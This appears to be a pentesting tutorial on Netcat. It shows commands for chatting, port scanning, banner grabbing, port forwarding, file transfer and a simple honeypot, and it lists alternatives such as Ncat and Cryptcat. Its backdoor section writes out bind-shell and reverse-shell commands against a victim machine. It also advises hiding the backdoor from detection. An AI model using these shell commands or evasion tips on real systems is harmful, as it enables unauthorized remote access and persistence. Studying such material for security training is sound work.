Most of the tools in any hacker or pentester’s arsenal are task-specific; they specialize in one function only but Netcat, also known as the ‘TCP/IP Swiss Army Knife,’ does not fall into this category. Netcat is a tool capable of writing data across a network using TCP or UDP protocol but this simple capability allows it to perform many functionalities. Its capability to create almost any kind of connection makes it a simple and efficient network debugging and exploration tool. It has been built in such a manner that it can act as a client as well as a server, which elevates its utility to a higher level.
Netcat provides the following functionalities that can be useful for a hacker/pentester or a network admin:
Before describing Netcat functionalities in detail, some terms need to be explained briefly:
Port Scanning: The act of systematically scanning a host for open ports. Once determined, these open ports can be utilized to gain access to the host or to launch an attack.
Banner Grabbing: A fingerprinting technique aimed at extract information about a host such as operating system, web server, applications etc. A simple form of banner grabbing is to send a request and analyze the response received.
Port Redirection: A simple technique used to transfer traffic from one port to another. It is utilized to access services which are restricted in any specific environment.
Honeypot: A Honeypot is a monitored decoy used to attract attackers away from critical resources and also a tool to analyze an attacker’s methods and characteristics. It can emulate various services provided by an OS and also generate responses for those services. It provides an environment which is capable of interacting with an attacker and monitors his/her activities without any real resources at risk.
First of all let’s see all the options provided by Netcat:
root@bt:~# nc -h
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
|-c shell commands||as `-e'; use /bin/sh to exec [dangerous!!]|
|-e filename||program to exec after connect [dangerous!!]|
|-g gateway||source-routing hop point[s], up to 8|
|-G num||source-routing pointer: 4, 8, 12, …|
|-i secs||delay interval for lines sent, ports scanned|
|-k||set keepalive option on socket|
|-l||listen mode, for inbound connects|
|-n||numeric-only IP addresses, no DNS|
|-o file||hex dump of traffic|
|-p port||local port number|
|-r||randomize local and remote ports|
|-q secs||quit after EOF on stdin and delay of secs|
|-s addr||local source address|
|-T tos||set Type Of Service|
|-t||-t answer TELNET negotiation|
|-v||-v verbose [use twice to be more verbose]|
|-w secs||timeout for connects and final net reads|
|-z||zero-I/O mode [used for scanning]|
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp\-data’).
Let’s now dive into the details of Netcat as a tool.
Chatting: Netcat can be used for the purpose of chatting from one system to another. We need to configure Netcat to listen on a specific port at one machine and connect to that specific address (IP+port) from a remote Netcat instance as shown in figure 1.
Machine A root@bt:- # nc –l –p 123
Machine B C:\> nc 192.168.118.130 123
Figure 1. Chatting using Netcat
Port Scanning: Although there are many sophisticated tools available for the purpose of port scanning a host such as Nmap and Scapy, Netcat can also be used for it. It does not provide a very detailed output and has no advanced feature such as OS fingerprinting, yet it is capable of detecting if a port is open or not. Netcat as a port scanner is demonstrated in figure 2.
Machine B C:\> nc –v –w 2 –z 192.168.118.130 1-100
Figure 2. Port Scanning
Banner Grabbing: Extending this same feature, we can also perform banner grabbing. Figure 3 shows how we have extracted the web server header (Apache/2.2.14).
Machine B C:\> nc –vv 192.168.118.130 80
Figure 3. Banner Grabbing
Port Forwarding: Sometimes, there are restrictions imposed on the ports that we can utilize for outgoing connections (eg. in the office). This is where Netcat’s port redirection capability can be utilized. It allows listening on any specific port and redirecting that traffic to another port. So, on our home computer, we can listen on the port that is allowed in the restricted environment and forward it to the port we want to connect to. Now we simply need to connect to our home machine from that environment. The setup is displayed in the figure 4.
Machine A root@bt:- # nc –l –p 8008 –c “nc google.com 80″
Machine B Browse 192.168.118.130:8008
File Transfer: Extending it further, we can also transfer files using Netcat. For this, we need to set up Netcat on the receiving side in listen mode and forward any input received into a file, then on the sender’s side, we need to make a connection to the specific address of the receiving side and send in the file as demonstrated in figure 5. Netcat does not provide any method to check that the file has been transferred completely, so we need to wait for some time based on the file size and the transfer rate and then terminate the connection.
Machine A root@bt:- # nc –lv -p 123 > test.txt
Machine B C:\> nc 192.168.118.130 123 < test1.txt
Figure 5. File Transfer
Honeypot: Netcat can also be used to set up a very simple Honeypot. For this we need to set up Netcat in listen mode on a specific port and send a user-defined output to the incoming connection. It also allows us to see the traffic (probably an attack) received on the specific port. Figure 6 shows a simple Honeypot.
Machine A root@bt:- # nc –lvvp 443 < apache2.txt
Machine B C:\> nc 192.168.118.130 443
Figure 6. Simple Honeypot
Backdoor: Netcat can also be utilized as a backdoor. To understand the working of Netcat as a backdoor, let’s assume the following configuration:
Figure 7. Configuration Demonstration
Machine A is behind a NAT device and accesses the web using the private IP address provided by the NAT. The NAT device and B both have a public IP address as shown in figure 7.
Now there are two scenarios for this configuration:
I Bind Shell: In this scenario the attacker (A) needs to connect to the victim’s machine (B) in the future, so after exploiting the victim’s machine once, he/she has dropped a custom Netcat instance. On the victim’s machine, the Netcat will be executed under listen mode at a specific port and the command is redirected to an exe (cmd.exe). Now the attacker can simply connect to it by providing the IP address and the port number and can execute commands on the victim. Figure 8 clearly demonstrates the scenario.
Machine B C:\> nc –lvvp –e cmd.exe
Machine A root@bt:- # nc –v 192.168.118.1 1234
Figure 8. Bind Shell
II Reverse Shell: Now in this scenario the positions have been switched and the victim is behind a NAT device (A) and the attacker (B) needs to connect to him/her. So this time the attacker might utilize the feature of Netcat to transfer a command shell to a host listening for a connection. The Netcat instance at the victim’s machine will connect to the attacker and pass its command shell to the attacker’s machine listening for it as shown in figure 9.
Machine B C:\> nc –lvvp 1234
Machine A root@bt:- # nc –v 192.168.118.1 1234 –e /bin/bash
Figure 9. Reverse Shell
While using Netcat as a backdoor, we need to keep in mind that if we use it as-it-is then it will prompt a command shell window on the victim’s machine, so we need to make sure to hide it inside another process/executable or implement other techniques to make it undetectable.
So we have discussed some handy uses of Netcat, but these are not the only functionalities it provides. We can utilize this application to do much more by integrating it with other tools. Netcat is a very powerful tool but sometimes is flagged as malware by anti-virus distributions; hence, we should also discuss some Netcat alternatives which provide some additional functionality.
Cryptcat: Cryptcat is a Netcat clone with twofish encryption, so that the communication sent/received is encrypted. All of the other functions are the same as Netcat. Cryptcat can be downloaded from http://sourceforge.net/projects/cryptcat/files/.
SBD: Similar to Cryptcat, SBD is another Netcat clone with AES-CBC-128 + HMAC-SHA1 for the purpose of encryption.
Socat: Socat is similar to Netcat and supports different protocols. It can work through files, pipes, sockets, proxy, SSL etc.
Ncat: Ncat is an improved reimplementation of Netcat and comes along with the widely used port scanner Nmap. Apart from the usual options, it provides advanced features like IPv6 support, Ncat chaining, SCTP support, etc. Ncat provides support for SSL which enables the user to securely transfer files or to connect to SSL enabled services. Ncat also provides support for proxies (HTTP/SOCKS) and can itself act as a proxy. We can also define a blacklist of hosts that we do not want to connect to us using the ‘deny’ option. One other interesting feature provided by Ncat is the ‘broker’ feature, which allows multiple hosts to connect to a centralized Ncat server and communicate with each other. With all the new features, Ncat is a perfect replacement for Netcat. File transfer over SSL using Ncat is shown in the figure 10.
Machine A root@bt:- # Ncat –l –ssl 123 >Ncattest.txt
Machine B C:\>Ncat 192.168.118.130 123 –ssl < test2.txt
Figure 10. Ncat File Transfer over SSL
There are many other sophisticated tools for every feature provided by Netcat, yet no other tool is powerful enough to provide so many functionalities in a single package. Netcat is not only useful for a pentester but it can also be utilized by system administrators for their daily activities. The simplicity of the usage and implementation provided by Netcat makes it one of the widely used tools in every pentester’s arsenal.